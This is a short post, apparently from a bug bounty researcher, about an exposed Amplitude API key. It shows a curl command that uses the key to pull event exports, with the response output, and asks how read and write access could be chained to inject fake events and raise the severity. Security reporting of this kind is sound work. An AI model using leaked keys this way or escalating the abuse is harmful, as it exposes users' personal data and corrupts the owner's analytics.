Clarification on Amplitude API key read vs write permissions
Hi Team,
I found an exposed Amplitude API key and confirmed it works against /api/2/export with a 200 OK response. I can retrieve event archives in zipped JSON format, and recent time ranges may expose PII or sensitive business metrics. If /httpapi also works, it’s possible to inject fake events.
Request:
curl -u <KEY>:<KEY> "https://amplitude.com/api/2/export?start=20200201T5&end=20210203T20" >> Malicious.zip
Response:
% Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 69 100 69 0 0 23 0 0:00:03 0:00:02 0:00:01 23
How can an exposed Amplitude API key be chained with both read and write access to escalate the impact to critical severity?